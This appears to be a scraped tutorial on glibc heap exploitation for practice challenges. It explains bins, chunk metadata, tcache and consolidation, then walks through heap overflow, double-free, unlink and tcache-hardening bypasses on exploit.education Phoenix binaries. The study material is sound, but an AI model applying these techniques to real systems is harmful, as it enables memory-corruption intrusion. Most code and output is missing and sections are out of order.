Moving on to heap exploitation does not require you to be a god at stack exploitation, but it will require a better understanding of C and how concepts such as pointers work. From time to time we will be discussing the glibc source code itself, and while this can be really overwhelming, it's incredibly good practice.
I'll do everything I can to make it as simple as possible. Most references (to start with) will be hyperlinks, so feel free to just keep the concept in mind for now; as you progress, understanding the source will become more and more important.
Occasionally different snippets of code will be from different glibc versions, and I'll do my best to note down which version they are from. The reason for this is that newer versions have a lot of protections that will obscure the basic logic of the operation, so we will start with older implementations and build up.
When we are done with a chunk's data, the chunk is freed using a function such as free(). This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100 bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?
The bins are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations on each bin differ as well to keep performance high.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.
There are four types of bins: fastbins, the unsorted bin, small bins and large bins.
When a chunk is freed, the function that does the bulk of the work in glibc is _int_free(). I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old version without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to where they are in the present day! You can change the version on the left in bootlin to see how it's changed.
First, the size of the chunk is checked. If it is less than the largest fastbin size, the chunk is added to the correct fastbin
Otherwise, if the chunk is mmapped, it is munmapped
Finally, the chunk is consolidated with any free neighbours and put into the unsorted bin
What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.
There is only one of these. When small and large chunks are freed, they end up in this bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the Last Remainder Chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fastbins, chunks of the same size are stored in the same bin. Small bins are doubly-linked, and allocation and deallocation are FIFO.
The purpose of the FD and BK pointers, as we saw before, is to point to the chunks ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.
There are 63 large bins, which can store chunks of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.
The first 32 bins have a range of 64 bytes:
Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.
Each bin is represented by two values, the HEAD and TAIL. As it sounds, HEAD is at the top and TAIL at the bottom. Most insertions happen at the HEAD, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL. For fastbins, the TAIL is null.
Unlike the stack, the heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.
In C, this often means using functions such as malloc() to request the space. However, heap operations are comparatively slow and heap data can take up a lot of space. This means the developer has to tell libc when the heap data is "finished with", and it does this via calls to free(), which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.
In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.
Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0 if the fastbin is empty). Every chunk in the fastbin has an fd pointer, which points to the next chunk in the bin (or is 0 if it is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list
Let's have a visual demonstration (it will help)! Try out the following C program:
We get:
As you can see, the chunk a gets reassigned to chunk f, b to e and c to d. So, if we free() a chunk, there's a good chance our next malloc() - if it's of the same size - will use the same chunk.
It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:
In this case HEAD points to a, and a points onwards to b as the next chunk in the bin (because the fd field of a points to b). Now let's say we free another chunk c. If we want to add it to the end of the list like so:
We would have to update the fd pointer of b to point at c. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of the list, which could be many chunks long. This means that to add c in at the end, it would first have to start at the head and traverse the entire list until it got to the last chunk, then overwrite the fd field of the last chunk to point at c and make c the last chunk.
Meanwhile, if it adds at the HEAD:
All we need to do is:
Set the fd of c to point at a
This is easy, as a was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c, making it the head of the list
This is also easy, as the pointer to c is freely available
This has much less overhead!
For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a by reading the fd of c than it is to traverse the entire list until it gets to the end.
Internally, every chunk - whether allocated or free - is stored in a structure. The difference is how the memory space is used.
When space is allocated from the heap using a function such as malloc(), a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.
The size field is the overall size of the chunk, including metadata. It must be a multiple of 8 (in fact, a multiple of 16 on 64-bit systems), meaning the last 3 bits of size are always 0. This allows the flags A, M and P to take up that space, with A being the 3rd-last bit of size, M the 2nd-last and P the last.
The flags have special uses:
Free chunks have additional metadata to handle the linking between them.
In Consolidating Fastbins, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true - they just don't consolidate automatically; in order for them to consolidate, malloc_consolidate() has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.
Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer, which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!
If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if a chunk is the only element in the list, both its fd and bk will point to a location in malloc_state, which is contained within libc.
This means that the more important thing for us to know is how we can trigger malloc_consolidate().
Some of the most important ways include:
Inputting a very long number into scanf (around 0x400 characters long). This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end - so it works to trigger those functions too, great for triggering hooks!).
Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created.
Both of these work because a largebin allocation triggers malloc_consolidate. By checking the calls to the function in glibc 2.35, we can find other triggers.
It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.
The most common and most important trigger: a call to malloc() requesting a chunk of largebin size will trigger a call to malloc_consolidate().
There is another call to it in the use_top section of _int_malloc(). This section is reached when the top chunk has to be used to service the request. The code checks whether the top chunk is large enough to service the request:
So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().
(If both conditions fail, _int_malloc falls back to essentially using mmap to service the request.)
TODO
P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the chunk ahead) is in use
M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap() rather than a heap mechanism such as malloc()
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in main_arena; we will get to arenas in a later section, but in essence every created thread is provided a different arena (up to a limit), and chunks in these arenas have the A bit set
prev_size is set if the previous adjacent chunk is free, as calculated by P being 0. If it is not free, the heap saves space and prev_size is part of the previous chunk's user data. If it is free, then prev_size stores the size of the previous chunk.
This can be seen in the struct:
If not, it checks whether there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!
Calling malloc_trim() will also consolidate fastbins (which makes sense, given the name). Unlikely to ever be useful, but please do let me know if you find a use for it!
When changing malloc options using mallopt, malloc_consolidate() is called first. This is pretty useless, as mallopt is likely called once (if at all) in the program prelude, before the program does anything.
When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks through the bins:
If the requested size is fastbin size, check the corresponding fastbin
If there is a chunk in it, return it
If the requested chunk is of smallbin size, check the corresponding smallbin
If there is a chunk in it, return it
If the requested chunk is large (of largebin size), we first consolidate the fastbins with malloc_consolidate(). We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
If it is empty, we service the request through making the heap larger by moving the top chunk back and making space
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger, the chunk is sorted into the appropriate small or large bin, and the search continues
One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!
Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.
It wouldn't be fun if there were no protections, right?
Using Xenial Xerus, try running:
Notice that it throws an error.
Is the chunk at the top of the bin the same as the chunk being inserted?
For example, the following code still works:
When removing the chunk from a fastbin, make sure the size falls into the fastbin's range
The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd with something like 0x08041234, you have to make sure the metadata fits - i.e. the size field ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.
Much like the name suggests, this technique involves us using data once it has been freed. The weakness here is that programmers often wrongly assume that once a chunk is freed it cannot be used, and don't bother writing checks to ensure the data is not accessed again. This means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
Reintroducing double-frees
Tcache poisoning is a fancy name for controlling the next pointer of tcache chunks - here, achieved via a double-free.
http://exploit.education/phoenix/heap-zero/
Luckily it gives us the source:
So let's analyse what it does:
Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of chunk d
Runs whatever the fp variable of f points at
The weakness here is clear - it calls a function pointer stored on the heap. Our input is copied there after the value is set and there's no bounds checking whatsoever, so we can overrun it easily.
Let's check out the heap in normal conditions.
We'll break right after the strcpy and see how it looks.
If we want, we can check the contents.
So, we can see that the function address is there, after our input in memory. Let's work out the offset.
Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn Sequence.
Let's break on and after the strcpy. That way we can check the location of the pointer, then immediately read it and calculate the offset.
So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).
So, fairly simple - 80 characters, then the address of winner.
We need to remove the null bytes because argv doesn't allow them.
http://exploit.education/phoenix/heap-one/
This program:
Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something
Let's break on and after the first strcpy.
As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.
Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!
And where better to target than the GOT?
The plan, therefore, becomes:
Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner
But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.
Luckily, compilers like gcc compile printf as puts when there are no format arguments - we can see this with radare2:
So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer, and then we're good to go.
Break on and after the strcpy again and analyse the second chunk's name pointer.
The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.
The offset is 40.
Again, null bytes aren't allowed in parameters so you have to remove them.
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd pointer. This means that if chunk a points to chunk b, once chunk a is freed, the next chunk in the bin is chunk b.
In a double-free, we attempt to control fd. By overwriting it with an arbitrary memory address, we can tell malloc() where the next chunk is to be allocated. For example, say we overwrote a->fd to point at 0x12345678; once a is free, the next chunk on the list will be 0x12345678.
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:
Fairly logical.
But what happens if we called malloc() again for the same size?

Well, strange things would happen. a is both allocated (in the form of b) and free at the same time.
If you remember, the heap attempts to save as much space as possible, and when a chunk is free the fd pointer is written where the user data used to be.
But what does this mean?
When we write into the user data of b, we're writing into the fd of a at the same time.
And remember - controlling fd means we can control where the next chunk gets allocated! So we can write an address into the data of b, and that's where the next chunk gets placed.
Now, the next alloc will return a again. This doesn't matter - we want the one afterwards.
Boom - an arbitrary write.
We're still on Xenial Xerus, meaning both of the checks mentioned previously are still relevant. The bypass for the second check (malloc() memory corruption) is given to you in the form of fake metadata already set to a suitable size. Let's check the relevant parts of the source.
The fakemetadata variable is the fake size of 0x30, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin variable, meaning that if you pull the exploit off and land on the fake metadata, you can just overwrite admin as proof.
users is a list of strings for the usernames, and userCount keeps track of the length of the array.
Prompts for input, takes in input. Note that main() itself prints out the location of fakemetadata, so we don't have to mess around with that at all.
createUser() allocates a chunk of size 0x20 on the heap (the real size is 0x30 including metadata, hence fakemetadata being 0x30), then sets the array entry as a pointer to that chunk. Input then gets written there.
Gets the index, prints out the details and free()s the chunk. Easy peasy.
Checks whether you overwrote admin with admin; if you did, mission accomplished!
There are literally no checks in place, so we have a plethora of options available - but this tutorial is about using a double-free, so that's what we'll use.
First let's make a skeleton of a script, along with some helper functions:
As we know from the fasttop protection, we can't allocate once then free twice - we'll have to free another chunk in between.
Let's check the progression of the fastbin by adding a pause() after every delete(). We'll hook on with radare2 using
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2 (dmhf analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000. Let's keep going.
The next chunk (Chunk 1) has been added to the top of the fastbin; this chunk is located at 0xd58030.
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.
Now that we have a double-free, let's allocate Chunk 0 again and put in some random data. Because it's also considered free, the data we write is seen as being in the fd pointer of the chunk. Remember, the heap saves space, so fd when free is located exactly where the data is when allocated (probably explained better here).
So let's write to fd, and see what happens to the fastbin. Remove all the pause() instructions.
Run, debug, and dmhf 2.
The chunk from the last free() gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata location at the beginning of the exploit chain.
The reason we have to subtract 8 from fakemetadata is that the only thing we faked in the source is the size field, but prev_size is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata variable, it'll interpret it as prev_size and the 8 bytes afterwards as size, so we shift it all back 8 bytes to align it correctly.
Now we can control where we write, and we know where to write to.
First, let's replace the location we write to with where we want to:
Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.
The 8 null bytes are padding. If you read the source, you'll notice the metadata string is 16 bytes long rather than 8, so we need 8 more bytes of padding.
Awesome - we completed the level!
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)
When a chunk is removed from a bin, unlink() is called on the chunk. The unlink macro looks like this:
Note how values are written to locations derived from fd and bk - if we control both fd and bk, we can get an arbitrary write.
Consider the following example:
We want to write the value 0x1000000c to 0x5655578c. If we had the ability to create a fake free chunk, we could choose the values for fd and bk. In this example, we would set fd to 0x56555780 (bear in mind the first 0x8 bytes in 32-bit would be for the metadata, so P->fd is actually 8 bytes off P and P->bk is 12 bytes off) and bk to 0x10000000. Then when we unlink() this fake chunk, the process is as follows:
This may seem like a lot to take in - it's a lot of seemingly random numbers. What you need to understand is that P->fd just means 8 bytes off P and P->bk just means 12 bytes off P.
If you imagine the chunk looking like this:

Then the fd and bk pointers point at the start of the chunk - prev_size. So when overwriting the fd pointer here:
FD points to 0x56555780, and then 0xc gets added on for bk, making the write actually occur at 0x5655578c, which is what we wanted. That is why we fake fd and bk values lower than the actual intended write location.
In 64-bit, all the chunk data fields take up 0x8 bytes each, so the offsets for fd and bk will be 0x10 and 0x18 respectively.
The slight issue with the unlink exploit is that not only does fd get written where you want - bk gets written as well, and if the location you are writing either of these to is protected memory, the binary will crash.
More modern libc versions have a different version of the unlink macro, which looks like this:
Here unlink() checks the bk pointer of the forward chunk and the fd pointer of the backward chunk, making sure they point to P, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry struct, the key:
It's a pointer to a tcache_perthread_struct. In tcache_put(), we can see what key is set to:
The chunk being freed is the variable e. We can see here that before tcache_put() is called on it, a check is done:
The check determines whether the key field of the chunk e is already set to the address of the tcache_perthread_struct. Remember that this happens when the chunk is put into the tcache with tcache_put()! If the pointer is already there, there is a very high chance the chunk has already been freed - in which case, it's a double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
There is a 1/2^<size_t> chance that the key being tcache_perthread_struct already is a coincidence. To verify, glibc simply iterates through the tcache bin and compares the chunks to the one being freed:
It iterates through each entry, calling it tmp, and compares it to e. If they are equal, a double-free was detected.
You can think of the key as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.
In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if we can leak it instead, we get the location of tcache_perthread_struct - a heap leak, as it is always located at heap_base + 0x10.
The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]
This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key, however.
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.
Every single fd pointer is protected by PROTECT_PTR, which is undone by REVEAL_PTR:
Here, pos is the location of the current chunk and ptr the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, ASLR is being used as protection! The >>12 gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (effectively 28, really, as the uppermost bits are pretty predictable):
So, what does this mean to an attacker?
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR, and we can easily recreate it to fake our own mangled pointer.
When trying to get a chunk e out of the tcache, alignment is checked.
The macros are defined side-by-side, but really aligned_OK is for addresses while misaligned_chunk is for chunks.
This alignment check means you would have to guess bits of entropy when brute-forcing a mangled pointer, as only 1 in 16 guesses will even produce a correctly-aligned chunk.
New and efficient heap management
Starting in glibc 2.26, a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsorted bin.
The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.
Ironically, years of defenses that were implemented into the fastbins - such as the double-free check - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 is easier than one running under 2.25!
When a chunk is freed and tcache_put() is called on it, the key field is set to the location of the tcache_perthread_struct. Why is this relevant? Let's check _int_free():
So, what can we do against this? Well, this protection doesn't affect us that much - it stops a simple double-free, but if we have any kind of UAF primitive we can easily overwrite e->key. Even with a single byte, we still have a 255/256 chance of overwriting it to something that doesn't match key. Creating fake tcache chunks doesn't matter either, as even in the latest glibc version there is no equivalent check on them, meaning tcache poisoning is still doable.
In glibc 2.34, the key field was changed. Instead of tcache_put() setting key to the location of the tcache_perthread_struct, it sets it to tcache_key:
Note the as well!
What is tcache_key? It's defined and set directly below, in the tcache_key_initialize() function:
It attempts to call __getrandom(), which is defined as a stub and, for Linux, just uses a syscall to read n random bytes. If that fails for some reason, it calls random_bits() instead, which generates a pseudo-random number seeded by the time. Long story short: tcache_key is random. The check is the same as before, and the operation is the same - it's just completely random rather than based on ASLR. As the comment above it says:
It's a very rudimentary protection - we use the current location and the location we point to in order to mangle it. From a programming standpoint, it has virtually no overhead or performance impact. PROTECT_PTR has been implemented in several locations, including two in _int_free() (for fastbins). You can find REVEAL_PTR used as well.
It might be tempting to say that a partial overwrite is still possible, but there is a new security check that comes along with this Safe-Linking mechanism: the alignment check. This check ensures that chunks are 16-byte aligned and is only relevant to singly-linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in malloc.c will bring up plenty of different locations. The most important ones for us as attackers are probably the one in tcache_get() and the ones in _int_malloc().
There are three checks here. First in REMOVE_FB, the macro for removing a chunk from a fastbin:
Once on the victim chunk returned from the fastbin:
And lastly on every fastbin chunk while the remaining chunks are stashed into the tcache:
_int_free() checks the alignment if the tcache_entry's key is already set to the value it's meant to be and the whole double-free iteration check has to be done:
When all the fastbins are consolidated into the unsorted bin, they are checked for alignment:
Fastbin chunks are also checked for alignment in a handful of other functions that are not super important for attackers.
You may notice some of them use aligned_OK while others use misaligned_chunk.
MALLOC_ALIGN_MASK is defined as such:
MALLOC_ALIGNMENT is defined for i386 as 16. In binary that's 10000, so MALLOC_ALIGN_MASK is 1111, meaning the last 4 bits of the address are checked. This results in 16-byte alignment, as expected.